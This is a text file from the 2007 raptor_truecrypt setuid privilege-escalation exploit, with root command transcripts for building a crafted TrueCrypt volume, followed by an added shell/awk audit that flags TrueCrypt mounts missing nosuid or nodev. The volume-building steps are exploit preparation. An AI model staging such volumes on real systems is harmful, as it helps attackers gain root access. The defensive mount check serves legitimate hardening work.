$Id: pwned.txt,v 1.1.1.1 2007/04/04 11:31:56 raptor Exp $

raptor_truecrypt - setuid truecrypt privilege escalation
Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>

How to create your own evil truecrypt volume:

# id
uid=0(root) gid=0(root) groups=0(root)
# echo whatever > pwned.key
# truecrypt --type normal --filesystem none --size 256000 --encryption AES \
  --hash SHA-1 --keyfile pwned.key --create pwned.tc
Enter password for new volume 'pwned.tc': 
Re-enter password: 

TrueCrypt will now collect random data.

[...]

Done: 0.00 MB  Speed: 0.00 MB/s  Left: 0:02:47  
Volume created.
# truecrypt --keyfile pwned.key pwned.tc
Enter password for '/root/test/pwned.tc': 
# mke2fs /dev/mapper/truecrypt0

[...]

# mount /dev/mapper/truecrypt0 /mnt
# cd /mnt
# chmod 777 .
# rm -fr lost+found
# truecrypt -d /mnt
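
A defender-side check for the kind of mount this procedure produces, added here as an example and not part of the original advisory: it flags any /dev/mapper/truecrypt* filesystem mounted without nosuid or nodev, the standard mount options that keep setuid bits and device nodes on a user-supplied filesystem from being honoured. The function names and the sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original advisory.
# Sample data below is constructed, in /proc/mounts format.

# audit_tc_mounts: read /proc/mounts-format lines on stdin and report each
# /dev/mapper/truecrypt* mount whose options lack nosuid or nodev.
# Exit status: 0 = nothing flagged, 1 = at least one finding.
audit_tc_mounts() {
    awk '
    $1 ~ /^\/dev\/mapper\/truecrypt[0-9]+$/ {
        nosuid = 0; nodev = 0
        n = split($4, opt, ",")
        for (i = 1; i <= n; i++) {
            if (opt[i] == "nosuid") nosuid = 1
            if (opt[i] == "nodev")  nodev = 1
        }
        missing = ""
        if (!nosuid) missing = missing " nosuid"
        if (!nodev)  missing = missing " nodev"
        if (missing != "") {
            printf "%s on %s (%s): missing%s\n", $1, $2, $3, missing
            bad = 1
        }
    }
    END { exit bad + 0 }
    '
}

# Constructed sample: one mount with default options, one hardened, one partial.
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
/dev/mapper/truecrypt0 /mnt ext2 rw,relatime 0 0
/dev/mapper/truecrypt1 /media/vault ext2 rw,nosuid,nodev,relatime 0 0
/dev/mapper/truecrypt2 /home/alice/tc vfat rw,nodev,relatime 0 0
EOF
}

# Demo on the sample; on a live host: audit_tc_mounts < /proc/mounts
sample_mounts | audit_tc_mounts || echo "review the mounts listed above"
```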
